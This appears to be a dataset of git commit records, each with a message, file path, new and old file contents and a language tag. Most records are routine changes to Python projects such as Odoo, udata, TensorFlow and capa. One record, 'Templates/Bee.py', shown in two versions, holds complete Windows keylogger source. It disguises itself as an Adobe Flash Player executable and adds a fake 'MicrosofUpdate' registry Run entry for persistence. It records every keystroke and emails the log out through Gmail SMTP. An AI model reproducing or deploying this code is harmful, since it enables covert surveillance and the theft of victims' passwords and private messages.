GITHUB_TOKEN = os.environ.get('GITHUB_TOKEN')
if GITHUB_TOKEN:
cmd_delete_remote += (
'https://{}@github.com/autozimu/LanguageClient-neovim.git'
.format(GITHUB_TOKEN))
else:
cmd_delete_remote += 'origin'
for tag in tags:
if tag_to_version(tag) in versions_to_delete:
cmd_delete_local += ' ' + tag
cmd_delete_remote += ' ' + tag
if not cmd_delete_local.endswith('delete'):
subprocess.check_call(cmd_delete_local, shell=True)
if not (cmd_delete_remote.endswith('origin') or
cmd_delete_remote.endswith('.git')):
subprocess.check_call(cmd_delete_remote, shell=True)
| #!/usr/bin/env python3
import os
import subprocess
import re
import semver
def tag_to_version(tag):
version = re.sub(r'binary-', '', tag)
version = re.sub(r'-[x86|i686].*', '', version)
return version
subprocess.check_call('git pull --tags', shell=True)
tags = subprocess.check_output(
'git tag --list | grep binary', shell=True).decode('UTF-8').splitlines()
versions = sorted(list(set([tag_to_version(tag) for tag in tags])),
key=semver.parse_version_info)
versions_to_delete = versions[:-3]
cmd_delete_local = 'git tag --delete'
cmd_delete_remote = 'git push --delete '
GITHUB_TOKEN = os.environ.get('GITHUB_TOKEN')
if GITHUB_TOKEN:
cmd_delete_remote += (
'https://{}@github.com/autozimu/LanguageClient-neovim.git'
.format(GITHUB_TOKEN))
else:
cmd_delete_remote += 'origin'
for tag in tags:
if tag_to_version(tag) in versions_to_delete:
cmd_delete_local += ' ' + tag
cmd_delete_remote += ' ' + tag
if not cmd_delete_local.endswith('delete'):
subprocess.check_call(cmd_delete_local, shell=True)
if not (cmd_delete_remote.endswith('origin') or
cmd_delete_remote.endswith('.git')):
subprocess.check_call(cmd_delete_remote, shell=True)
| Python | 0.000001 |
94aed149fd39ba9a6dd6fcf5dcc44c6e4f2a09b9 | fix imports | website_sale_search_clear/controllers.py | website_sale_search_clear/controllers.py | # -*- coding: utf-8 -*-
from odoo import http
from odoo.addons.website_sale.controllers.main import WebsiteSale as controller
class WebsiteSale(controller):
@http.route()
def shop(self, page=0, category=None, search='', **post):
if category and search:
category = None
return super(WebsiteSale, self).shop(page, category, search, **post)
| # -*- coding: utf-8 -*-
from openerp import http
from openerp.addons.website_sale.controllers.main import website_sale as controller
class WebsiteSale(controller):
@http.route()
def shop(self, page=0, category=None, search='', **post):
if category and search:
category = None
return super(WebsiteSale, self).shop(page, category, search, **post)
| Python | 0.000004 |
24a1bb4fed640a61caa1613cfe4da29a530a8efc | Fix enconding issue on Harvest Config validation | udata/harvest/forms.py | udata/harvest/forms.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from udata.forms import Form, fields, validators
from udata.i18n import lazy_gettext as _
from .actions import list_backends
from .models import VALIDATION_STATES, VALIDATION_REFUSED
__all__ = 'HarvestSourceForm', 'HarvestSourceValidationForm'
class HarvestConfigField(fields.DictField):
'''
A DictField with extras validations on known configurations
'''
def get_backend(self, form):
return next(b for b in list_backends() if b.name == form.backend.data)
def get_filter_specs(self, backend, key):
candidates = (f for f in backend.filters if f.key == key)
return next(candidates, None)
def get_feature_specs(self, backend, key):
candidates = (f for f in backend.features if f.key == key)
return next(candidates, None)
def pre_validate(self, form):
if self.data:
backend = self.get_backend(form)
# Validate filters
for f in (self.data.get('filters') or []):
if not ('key' in f and 'value' in f):
msg = 'A field should have both key and value properties'
raise validators.ValidationError(msg)
specs = self.get_filter_specs(backend, f['key'])
if not specs:
msg = 'Unknown filter key "{0}" for "{1}" backend'
msg = msg.format(f['key'], backend.name)
raise validators.ValidationError(msg)
f['value'] = f['value'].encode('utf-8') #Fix encoding error
if not isinstance(f['value'], specs.type):
msg = '"{0}" filter should of type "{1}"'
msg = msg.format(specs.key, specs.type.__name__)
raise validators.ValidationError(msg)
# Validate features
for key, value in (self.data.get('features') or {}).items():
if not isinstance(value, bool):
msg = 'A feature should be a boolean'
raise validators.ValidationError(msg)
if not self.get_feature_specs(backend, key):
msg = 'Unknown feature "{0}" for "{1}" backend'
msg = msg.format(key, backend.name)
raise validators.ValidationError(msg)
class HarvestSourceForm(Form):
name = fields.StringField(_('Name'), [validators.required()])
description = fields.MarkdownField(
_('Description'),
description=_('Some optionnal details about this harvester'))
url = fields.URLField(_('URL'), [validators.required()])
backend = fields.SelectField(_('Backend'), choices=lambda: [
(b.name, b.display_name) for b in list_backends()
])
owner = fields.CurrentUserField()
organization = fields.PublishAsField(_('Publish as'))
config = HarvestConfigField()
class HarvestSourceValidationForm(Form):
state = fields.SelectField(choices=VALIDATION_STATES.items())
comment = fields.StringField(_('Comment'),
[validators.RequiredIfVal('state',
VALIDATION_REFUSED
)])
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from udata.forms import Form, fields, validators
from udata.i18n import lazy_gettext as _
from .actions import list_backends
from .models import VALIDATION_STATES, VALIDATION_REFUSED
__all__ = 'HarvestSourceForm', 'HarvestSourceValidationForm'
class HarvestConfigField(fields.DictField):
'''
A DictField with extras validations on known configurations
'''
def get_backend(self, form):
return next(b for b in list_backends() if b.name == form.backend.data)
def get_filter_specs(self, backend, key):
candidates = (f for f in backend.filters if f.key == key)
return next(candidates, None)
def get_feature_specs(self, backend, key):
candidates = (f for f in backend.features if f.key == key)
return next(candidates, None)
def pre_validate(self, form):
if self.data:
backend = self.get_backend(form)
# Validate filters
for f in (self.data.get('filters') or []):
if not ('key' in f and 'value' in f):
msg = 'A field should have both key and value properties'
raise validators.ValidationError(msg)
specs = self.get_filter_specs(backend, f['key'])
if not specs:
msg = 'Unknown filter key "{0}" for "{1}" backend'
msg = msg.format(f['key'], backend.name)
raise validators.ValidationError(msg)
if not isinstance(f['value'], specs.type):
msg = '"{0}" filter should of type "{1}"'
msg = msg.format(specs.key, specs.type.__name__)
raise validators.ValidationError(msg)
# Validate features
for key, value in (self.data.get('features') or {}).items():
if not isinstance(value, bool):
msg = 'A feature should be a boolean'
raise validators.ValidationError(msg)
if not self.get_feature_specs(backend, key):
msg = 'Unknown feature "{0}" for "{1}" backend'
msg = msg.format(key, backend.name)
raise validators.ValidationError(msg)
class HarvestSourceForm(Form):
name = fields.StringField(_('Name'), [validators.required()])
description = fields.MarkdownField(
_('Description'),
description=_('Some optionnal details about this harvester'))
url = fields.URLField(_('URL'), [validators.required()])
backend = fields.SelectField(_('Backend'), choices=lambda: [
(b.name, b.display_name) for b in list_backends()
])
owner = fields.CurrentUserField()
organization = fields.PublishAsField(_('Publish as'))
config = HarvestConfigField()
class HarvestSourceValidationForm(Form):
state = fields.SelectField(choices=VALIDATION_STATES.items())
comment = fields.StringField(_('Comment'),
[validators.RequiredIfVal('state',
VALIDATION_REFUSED
)])
| Python | 0 |
683ccc69c51a64146dda838ad01674ca3b95fccd | Remove useless hearing comments router | democracy/urls_v1.py | democracy/urls_v1.py | from django.conf.urls import include, url
from rest_framework_nested import routers
from democracy.views import (
CommentViewSet, ContactPersonViewSet, HearingViewSet, ImageViewSet, LabelViewSet, ProjectViewSet,
RootSectionViewSet, SectionCommentViewSet, SectionViewSet, UserDataViewSet, FileViewSet, ServeFileView
)
router = routers.DefaultRouter()
router.register(r'hearing', HearingViewSet, base_name='hearing')
router.register(r'users', UserDataViewSet, base_name='users')
router.register(r'comment', CommentViewSet, base_name='comment')
router.register(r'image', ImageViewSet, base_name='image')
router.register(r'section', RootSectionViewSet, base_name='section')
router.register(r'label', LabelViewSet, base_name='label')
router.register(r'contact_person', ContactPersonViewSet, base_name='contact_person')
router.register(r'project', ProjectViewSet, base_name='project')
router.register(r'file', FileViewSet, base_name='file')
hearing_child_router = routers.NestedSimpleRouter(router, r'hearing', lookup='hearing')
hearing_child_router.register(r'sections', SectionViewSet, base_name='sections')
section_comments_router = routers.NestedSimpleRouter(hearing_child_router, r'sections', lookup='comment_parent')
section_comments_router.register(r'comments', SectionCommentViewSet, base_name='comments')
urlpatterns = [
url(r'^', include(router.urls, namespace='v1')),
url(r'^', include(hearing_child_router.urls, namespace='v1')),
url(r'^', include(section_comments_router.urls, namespace='v1')),
url(r'^download/(?P<filetype>sectionfile|sectionimage)/(?P<pk>\d+)/$', ServeFileView.as_view(), name='serve_file'),
]
| from django.conf.urls import include, url
from rest_framework_nested import routers
from democracy.views import (
CommentViewSet, ContactPersonViewSet, HearingViewSet, ImageViewSet, LabelViewSet, ProjectViewSet,
RootSectionViewSet, SectionCommentViewSet, SectionViewSet, UserDataViewSet, FileViewSet, ServeFileView
)
router = routers.DefaultRouter()
router.register(r'hearing', HearingViewSet, base_name='hearing')
router.register(r'users', UserDataViewSet, base_name='users')
router.register(r'comment', CommentViewSet, base_name='comment')
router.register(r'image', ImageViewSet, base_name='image')
router.register(r'section', RootSectionViewSet, base_name='section')
router.register(r'label', LabelViewSet, base_name='label')
router.register(r'contact_person', ContactPersonViewSet, base_name='contact_person')
router.register(r'project', ProjectViewSet, base_name='project')
router.register(r'file', FileViewSet, base_name='file')
hearing_comments_router = routers.NestedSimpleRouter(router, r'hearing', lookup='comment_parent')
hearing_child_router = routers.NestedSimpleRouter(router, r'hearing', lookup='hearing')
hearing_child_router.register(r'sections', SectionViewSet, base_name='sections')
section_comments_router = routers.NestedSimpleRouter(hearing_child_router, r'sections', lookup='comment_parent')
section_comments_router.register(r'comments', SectionCommentViewSet, base_name='comments')
urlpatterns = [
url(r'^', include(router.urls, namespace='v1')),
url(r'^', include(hearing_comments_router.urls, namespace='v1')),
url(r'^', include(hearing_child_router.urls, namespace='v1')),
url(r'^', include(section_comments_router.urls, namespace='v1')),
url(r'^download/(?P<filetype>sectionfile|sectionimage)/(?P<pk>\d+)/$', ServeFileView.as_view(), name='serve_file'),
]
| Python | 0 |
ad153499a3982182533033acfa17971a35d7a587 | implement __eq__ | capa/features/address.py | capa/features/address.py | import abc
from dncil.clr.token import Token
class Address(abc.ABC):
@abc.abstractmethod
def __eq__(self, other):
...
@abc.abstractmethod
def __lt__(self, other):
# implement < so that addresses can be sorted from low to high
...
@abc.abstractmethod
def __hash__(self):
# implement hash so that addresses can be used in sets and dicts
...
@abc.abstractmethod
def __repr__(self):
# implement repr to help during debugging
...
class AbsoluteVirtualAddress(int, Address):
"""an absolute memory address"""
def __new__(cls, v):
assert v >= 0
return int.__new__(cls, v)
def __repr__(self):
return f"absolute(0x{self:x})"
class RelativeVirtualAddress(int, Address):
"""a memory address relative to a base address"""
def __repr__(self):
return f"relative(0x{self:x})"
class FileOffsetAddress(int, Address):
"""an address relative to the start of a file"""
def __new__(cls, v):
assert v >= 0
return int.__new__(cls, v)
def __repr__(self):
return f"file(0x{self:x})"
class DNTokenAddress(Address):
"""a .NET token"""
def __init__(self, token: Token):
self.token = token
def __eq__(self, other):
return self.token.value == other.token.value
def __lt__(self, other):
return self.token.value < other.token.value
def __hash__(self):
return hash(self.token.value)
def __repr__(self):
return f"token(0x{self.token.value:x})"
class DNTokenOffsetAddress(Address):
"""an offset into an object specified by a .NET token"""
def __init__(self, token: Token, offset: int):
assert offset >= 0
self.token = token
self.offset = offset
def __eq__(self, other):
return (self.token.value, self.offset) == (other.token.value, other.offset)
def __lt__(self, other):
return (self.token.value, self.offset) < (other.token.value, other.offset)
def __hash__(self):
return hash((self.token.value, self.offset))
def __repr__(self):
return f"token(0x{self.token.value:x})+(0x{self.offset:x})"
class _NoAddress(Address):
def __eq__(self, other):
return True
def __lt__(self, other):
return False
def __hash__(self):
return hash(0)
def __repr__(self):
return "no address"
NO_ADDRESS = _NoAddress()
| import abc
from dncil.clr.token import Token
class Address(abc.ABC):
@abc.abstractmethod
def __lt__(self, other):
# implement < so that addresses can be sorted from low to high
...
@abc.abstractmethod
def __hash__(self):
# implement hash so that addresses can be used in sets and dicts
...
@abc.abstractmethod
def __repr__(self):
# implement repr to help during debugging
...
class AbsoluteVirtualAddress(int, Address):
"""an absolute memory address"""
def __new__(cls, v):
assert v >= 0
return int.__new__(cls, v)
def __repr__(self):
return f"absolute(0x{self:x})"
class RelativeVirtualAddress(int, Address):
"""a memory address relative to a base address"""
def __repr__(self):
return f"relative(0x{self:x})"
class FileOffsetAddress(int, Address):
"""an address relative to the start of a file"""
def __new__(cls, v):
assert v >= 0
return int.__new__(cls, v)
def __repr__(self):
return f"file(0x{self:x})"
class DNTokenAddress(Address):
"""a .NET token"""
def __init__(self, token: Token):
self.token = token
def __lt__(self, other):
return self.token.value < other.token.value
def __hash__(self):
return hash(self.token.value)
def __repr__(self):
return f"token(0x{self.token.value:x})"
class DNTokenOffsetAddress(Address):
"""an offset into an object specified by a .NET token"""
def __init__(self, token: Token, offset: int):
assert offset >= 0
self.token = token
self.offset = offset
def __lt__(self, other):
return (self.token.value, self.offset) < (other.token.value, other.offset)
def __hash__(self):
return hash((self.token.value, self.offset))
def __repr__(self):
return f"token(0x{self.token.value:x})+(0x{self.offset:x})"
class _NoAddress(Address):
def __lt__(self, other):
return False
def __hash__(self):
return hash(0)
def __repr__(self):
return "no address"
NO_ADDRESS = _NoAddress()
| Python | 0.00008 |
e660953c1df2dc9de6b3038e4ddb1d77768b2b51 | Correct pyhande dependencies (broken for some time) | tools/pyhande/setup.py | tools/pyhande/setup.py | from distutils.core import setup
setup(
name='pyhande',
version='0.1',
author='HANDE developers',
packages=('pyhande',),
license='Modified BSD license',
description='Analysis framework for HANDE calculations',
long_description=open('README.rst').read(),
install_requires=['numpy', 'scipy', 'pandas', 'pyblock', 'matplotlib'],
)
| from distutils.core import setup
setup(
name='pyhande',
version='0.1',
author='HANDE developers',
packages=('pyhande',),
license='Modified BSD license',
description='Analysis framework for HANDE calculations',
long_description=open('README.rst').read(),
requires=['numpy', 'pandas (>= 0.13)', 'pyblock',],
)
| Python | 0 |
776c8fd802385ef4294112e76365df6bdf93476a | Update Bee.py | Templates/Bee.py | Templates/Bee.py | import pythoncom, pyHook
from os import path
from sys import exit
import threading
import urllib,urllib2
import smtplib
import datetime,time
import win32com.client
import win32event, win32api, winerror
from _winreg import *
import shutil
import sys
mutex = win32event.CreateMutex(None, 1, 'N0tAs519n')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
print "err"
exit(0)
x=''
data=''
count=0
dir = "C:\\Users\\Public\\Libraries\\adobeflashplayer.exe"
def startup():
shutil.copy(sys.argv[0],dir)
aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
SetValueEx(aKey,"MicrosofUpdate",0, REG_SZ, dir)
if path.isfile(dir) == False:
startup()
class TimerClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.event = threading.Event()
def run(self):
while not self.event.is_set():
global data
if len(data)>50:
ts = datetime.datetime.now()
SERVER = "smtp.gmail.com"
PORT = 587
USER = EEMAIL
PASS = EPASS
FROM = USER
TO = [USER]
SUBJECT = "B33: "+str(ts)
MESSAGE = data
message = """\
From: %s
To: %s
Subject: %s
%s
""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
try:
server = smtplib.SMTP()
server.connect(SERVER,PORT)
server.starttls()
server.login(USER,PASS)
server.sendmail(FROM, TO, message)
data=''
server.quit()
except Exception as e:
print e
self.event.wait(120)
def main():
global x
em4=TimerClass()
em4.start()
return True
if __name__ == '__main__':
main()
def pushing(event):
global x,data
if event.Ascii==13:
e4Ch=' [ENTER] '
elif event.Ascii==8:
e4Ch=' [BACKSPACE] '
elif (event.Ascii == 162 or event.Ascii == 163):
e4Ch = ' [CTRL] '
elif (event.Ascii == 164 or event.Ascii == 165):
e4Ch = ' [ALT] '
elif (event.Ascii == 160 or event.Ascii == 161):
e4Ch = ' [SHIFT] '
elif (event.Ascii == 46):
e4Ch = ' [DELETE] '
elif (event.Ascii == 32):
e4Ch = ' [SPACE] '
elif (event.Ascii == 27):
e4Ch = ' [ESC] '
elif (event.Ascii == 9):
e4Ch = ' [TAB] '
elif (event.Ascii == 20):
e4Ch = ' [CAPSLOCK] '
elif (event.Ascii == 38):
e4Ch = ' [UP] '
elif (event.Ascii == 40):
e4Ch = ' [DOWN] '
elif (event.Ascii == 37):
e4Ch = ' [LEFT] '
elif (event.Ascii == 39):
e4Ch = ' [RIGHT] '
elif (event.Ascii == 91):
e4Ch = ' [SUPER] '
else:
e4Ch=chr(event.Ascii)
data=data+e4Ch
obj = pyHook.HookManager()
obj.KeyDown = pushing
obj.HookKeyboard()
pythoncom.PumpMessages()
| import pythoncom
import pyHook
from os import path
from sys import exit
from sys import argv
from shutil import copy
import threading
import urllib,urllib2
import smtplib
import datetime,time
import win32com.client
import win32event, win32api, winerror
from _winreg import *
mutex = win32event.CreateMutex(None, 1, 'N0tAs519ns')
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
mutex = None
print "err"
exit(0)
x=''
data=''
count=0
dir = "C:\\Users\\Public\\Libraries\\adobeflashplayer.exe"
def startup():
copy(argv[0],dir)
aReg = ConnectRegistry(None,HKEY_CURRENT_USER)
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
SetValueEx(aKey,"MicrosofUpdate",0, REG_SZ, dir)
if path.isfile(dir) == False:
startup()
class TimerClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.event = threading.Event()
def run(self):
while not self.event.is_set():
global data
if len(data)>50:
ts = datetime.datetime.now()
SERVER = "smtp.gmail.com"
PORT = 587
USER = EEMAIL
PASS = EPASS
FROM = USER
TO = [USER]
SUBJECT = "B33: "+str(ts)
MESSAGE = data
message = """\
From: %s
To: %s
Subject: %s
%s
""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
try:
server = smtplib.SMTP()
server.connect(SERVER,PORT)
server.starttls()
server.login(USER,PASS)
server.sendmail(FROM, TO, message)
data=''
server.quit()
except Exception as e:
print e
self.event.wait(120)
def main():
global x
em4=TimerClass()
em4.start()
return True
if __name__ == '__main__':
main()
def pushing(event):
global x,data
if event.Ascii==13:
e4Ch=' [ENTER] '
elif event.Ascii==8:
e4Ch=' [BACKSPACE] '
elif (event.Ascii == 162 or event.Ascii == 163):
e4Ch = ' [CTRL] '
elif (event.Ascii == 164 or event.Ascii == 165):
e4Ch = ' [ALT] '
elif (event.Ascii == 160 or event.Ascii == 161):
e4Ch = ' [SHIFT] '
elif (event.Ascii == 46):
e4Ch = ' [DELETE] '
elif (event.Ascii == 32):
e4Ch = ' [SPACE] '
elif (event.Ascii == 27):
e4Ch = ' [ESC] '
elif (event.Ascii == 9):
e4Ch = ' [TAB] '
elif (event.Ascii == 20):
e4Ch = ' [CAPSLOCK] '
elif (event.Ascii == 38):
e4Ch = ' [UP] '
elif (event.Ascii == 40):
e4Ch = ' [DOWN] '
elif (event.Ascii == 37):
e4Ch = ' [LEFT] '
elif (event.Ascii == 39):
e4Ch = ' [RIGHT] '
elif (event.Ascii == 91):
e4Ch = ' [SUPER] '
else:
e4Ch=chr(event.Ascii)
data=data+e4Ch
obj = pyHook.HookManager()
obj.KeyDown = pushing
obj.HookKeyboard()
pythoncom.PumpMessages()
| Python | 0.000009 |
d07d87ea7f9d62e8274ba1b958d08756d071653a | add format detection by magic number | thumbor/engines/__init__.py | thumbor/engines/__init__.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/globocom/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com timehome@corp.globo.com
class BaseEngine(object):
def __init__(self, context):
self.context = context
self.image = None
self.extension = None
self.source_width = None
self.source_height = None
self.icc_profile = None
def load(self, buffer, extension):
#magic number detection
if ( buffer[:4] == 'GIF8'):
extension = '.gif'
elif ( buffer[:8] == '\x89PNG\r\n\x1a\n'):
extension = '.png'
elif ( buffer[:2] == '\xff\xd8'):
extension = '.jpg'
self.extension = extension
self.image = self.create_image(buffer)
if self.source_width is None:
self.source_width = self.size[0]
if self.source_height is None:
self.source_height = self.size[1]
@property
def size(self):
return self.image.size
def normalize(self):
width, height = self.size
self.source_width = width
self.source_height = height
if width > self.context.config.MAX_WIDTH or height > self.context.config.MAX_HEIGHT:
width_diff = width - self.context.config.MAX_WIDTH
height_diff = height - self.context.config.MAX_HEIGHT
if self.context.config.MAX_WIDTH and width_diff > height_diff:
height = self.get_proportional_height(self.context.config.MAX_WIDTH)
self.resize(self.context.config.MAX_WIDTH, height)
return True
elif self.context.config.MAX_HEIGHT and height_diff > width_diff:
width = self.get_proportional_width(self.context.config.MAX_HEIGHT)
self.resize(width, self.context.config.MAX_HEIGHT)
return True
return False
def get_proportional_width(self, new_height):
width, height = self.size
return round(float(new_height) * width / height, 0)
def get_proportional_height(self, new_width):
width, height = self.size
return round(float(new_width) * height / width, 0)
def gen_image(self):
raise NotImplementedError()
def create_image(self):
raise NotImplementedError()
def crop(self):
raise NotImplementedError()
def resize(self):
raise NotImplementedError()
def focus(self, points):
pass
def flip_horizontally(self):
raise NotImplementedError()
def flip_vertically(self):
raise NotImplementedError()
def read(self, extension, quality):
raise NotImplementedError()
def get_image_data(self):
raise NotImplementedError()
def set_image_data(self, data):
raise NotImplementedError()
def get_image_mode(self):
""" Possible return values should be: RGB, RBG, GRB, GBR, BRG, BGR, RGBA, AGBR, ... """
raise NotImplementedError()
def paste(self):
raise NotImplementedError()
| #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/globocom/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com timehome@corp.globo.com
class BaseEngine(object):
def __init__(self, context):
self.context = context
self.image = None
self.extension = None
self.source_width = None
self.source_height = None
self.icc_profile = None
def load(self, buffer, extension):
self.extension = extension
self.image = self.create_image(buffer)
if self.source_width is None:
self.source_width = self.size[0]
if self.source_height is None:
self.source_height = self.size[1]
@property
def size(self):
return self.image.size
def normalize(self):
width, height = self.size
self.source_width = width
self.source_height = height
if width > self.context.config.MAX_WIDTH or height > self.context.config.MAX_HEIGHT:
width_diff = width - self.context.config.MAX_WIDTH
height_diff = height - self.context.config.MAX_HEIGHT
if self.context.config.MAX_WIDTH and width_diff > height_diff:
height = self.get_proportional_height(self.context.config.MAX_WIDTH)
self.resize(self.context.config.MAX_WIDTH, height)
return True
elif self.context.config.MAX_HEIGHT and height_diff > width_diff:
width = self.get_proportional_width(self.context.config.MAX_HEIGHT)
self.resize(width, self.context.config.MAX_HEIGHT)
return True
return False
def get_proportional_width(self, new_height):
width, height = self.size
return round(float(new_height) * width / height, 0)
def get_proportional_height(self, new_width):
width, height = self.size
return round(float(new_width) * height / width, 0)
def gen_image(self):
raise NotImplementedError()
def create_image(self):
raise NotImplementedError()
def crop(self):
raise NotImplementedError()
def resize(self):
raise NotImplementedError()
def focus(self, points):
pass
def flip_horizontally(self):
raise NotImplementedError()
def flip_vertically(self):
raise NotImplementedError()
def read(self, extension, quality):
raise NotImplementedError()
def get_image_data(self):
raise NotImplementedError()
def set_image_data(self, data):
raise NotImplementedError()
def get_image_mode(self):
""" Possible return values should be: RGB, RBG, GRB, GBR, BRG, BGR, RGBA, AGBR, ... """
raise NotImplementedError()
def paste(self):
raise NotImplementedError()
| Python | 0.000001 |
b277ca357728010c9d763c95cc459540821802c0 | Update dice loss | dataset/models/tf/losses/__init__.py | dataset/models/tf/losses/__init__.py | """ Contains custom losses """
import tensorflow as tf
from ..layers import flatten
def dice(targets, predictions, weights=1.0, label_smoothing=0, scope=None,
loss_collection=tf.GraphKeys.LOSSES, reduction=tf.losses.Reduction.SUM_BY_NONZERO_WEIGHTS):
""" Dice coefficient
Parameters
----------
targets : tf.Tensor
tensor with target values
predictions : tf.Tensor
tensor with predicted logits
Returns
-------
Tensor of the same type as targets.
If reduction is NONE, this has the same shape as targets; otherwise, it is scalar.
"""
e = 1e-6
predictions = tf.sigmoid(predictions)
axis = tuple(range(1, targets.shape.ndims))
if label_smoothing > 0:
num_classes = targets.shape[-1]
targets = targets * (1 - label_smoothing) + label_smoothing / num_classes
intersection = tf.reduce_sum(targets * predictions, axis=axis)
targets = tf.reduce_sum(targets, axis=axis)
predictions = tf.reduce_sum(predictions, axis=axis)
loss = -(2. * intersection + e) / (targets + predictions + e)
loss = tf.losses.compute_weighted_loss(loss, weights, scope, loss_collection, reduction)
return loss
| """ Contains custom losses """
import tensorflow as tf
from ..layers import flatten
def dice(targets, predictions):
""" Dice coefficient
Parameters
----------
targets : tf.Tensor
tensor with target values
predictions : tf.Tensor
tensor with predicted values
Returns
-------
average loss : tf.Tensor with a single element
"""
e = 1e-6
intersection = flatten(targets * predictions)
loss = -tf.reduce_mean((2. * intersection + e) / (flatten(targets) + flatten(predictions) + e))
return loss
| Python | 0 |
4c9b47052c2c66671230f33ea84459e02b3b2f06 | Update Unit_Testing2.py | Unit_Testing2.py | Unit_Testing2.py | from unit_testing import *
import unittest
class UnitTests(unittest.TestCase):
def setUp(self):
print('setUp()...')
self.hash1 = Hash('1234')
self.email1 = Email('zmg@verizon.net')
def test(self):
print('testing hash...')
self.assertEqual(self.hash1, self.hash1) #failed
self.assertNotEqual(self.hash1, Hash('123'))
self.assertRaises(InvalidPassword, Hash, '1 ') #failed
#self.assertEqual(length of Hash for two different passwords)
print('testing email...')
self.assertEqual(str(self.email1), 'zmg@verizon.net')
self.assertRaises(InvalidEmail, Email, '@@') #failed
self.assertRaises(InvalidEmail, Email, '@gmail.com') #failed
print('testing social...')
self.assertRaises(InvalidSocial, SS, '123456789')
self.assertRaises(InvalidSocial, SS, '1234-567-89') #failed
self.assertRaises(InvalidSocial, SS, '-') #failed
self.assertRaises(InvalidSocial, SS, '1234-') #failed
def tearDown(self):
print('tearDown()...')
del self.hash1
del self.hash2
del self.hash3
del self.email1
| from unit_testing import *
import unittest
class UnitTests(unittest.TestCase):
def setUp(self):
print('setUp()...')
self.hash1 = Hash('1234')
self.hash2 = Hash('1234')
self.hash3 = Hash('123')
self.email1 = Email('P@V')
def test(self):
print('testing hash...')
self.assertEqual(self.hash1, self.hash2) #failed
self.assertNotEqual(self.hash1, self.hash3)
self.assertRaises(InvalidPassword, Hash, '1')
print('testing email...')
self.assertEqual(str(self.email1), 'P@V')
self.assertRaises(InvalidEmail, Email, 'thing')
self.assertRaises(InvalidEmail, Email, '@gmail.com') #failed
print('testing social...')
self.assertRaises(InvalidSocial, SS, '123456789')
self.assertRaises(InvalidSocial, SS, '1234-567-89') #failed
self.assertRaises(InvalidSocial, SS, '-') #failed
self.assertRaises(InvalidSocial, SS, '1234')
def tearDown(self):
print('tearDown()...')
del self.hash1
del self.hash2
del self.hash3
del self.email1
| Python | 0 |
4089730950d6005e257c20e6926000073fd41b33 | Enable Tensor equality for 2.0 | tensorflow/python/compat/v2_compat.py | tensorflow/python/compat/v2_compat.py | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Switching v2 features on and off."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import tf2
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import control_flow_v2_toggles
from tensorflow.python.ops import variable_scope
from tensorflow.python.util.tf_export import tf_export
@tf_export(v1=["enable_v2_behavior"])
def enable_v2_behavior():
"""Enables TensorFlow 2.x behaviors.
This function can be called at the beginning of the program (before `Tensors`,
`Graphs` or other structures have been created, and before devices have been
initialized. It switches all global behaviors that are different between
TensorFlow 1.x and 2.x to behave as intended for 2.x.
This function is called in the main TensorFlow `__init__.py` file, user should
not need to call it, except during complex migrations.
"""
# TF2 behavior is enabled if either 1) enable_v2_behavior() is called or
# 2) the TF2_BEHAVIOR=1 environment variable is set. In the latter case,
# the modules below independently check if tf2.enabled().
tf2.enable()
ops.enable_eager_execution()
tensor_shape.enable_v2_tensorshape() # Also switched by tf2
variable_scope.enable_resource_variables()
ops.enable_tensor_equality()
# Enables TensorArrayV2 and control flow V2.
control_flow_v2_toggles.enable_control_flow_v2()
@tf_export(v1=["disable_v2_behavior"])
def disable_v2_behavior():
"""Disables TensorFlow 2.x behaviors.
This function can be called at the beginning of the program (before `Tensors`,
`Graphs` or other structures have been created, and before devices have been
initialized. It switches all global behaviors that are different between
TensorFlow 1.x and 2.x to behave as intended for 1.x.
User can call this function to disable 2.x behavior during complex migrations.
"""
tf2.disable()
ops.disable_eager_execution()
tensor_shape.disable_v2_tensorshape() # Also switched by tf2
variable_scope.disable_resource_variables()
ops.disable_tensor_equality()
# Disables TensorArrayV2 and control flow V2.
control_flow_v2_toggles.disable_control_flow_v2()
| # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Switching v2 features on and off."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python import tf2
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import control_flow_v2_toggles
from tensorflow.python.ops import variable_scope
from tensorflow.python.util.tf_export import tf_export
@tf_export(v1=["enable_v2_behavior"])
def enable_v2_behavior():
"""Enables TensorFlow 2.x behaviors.
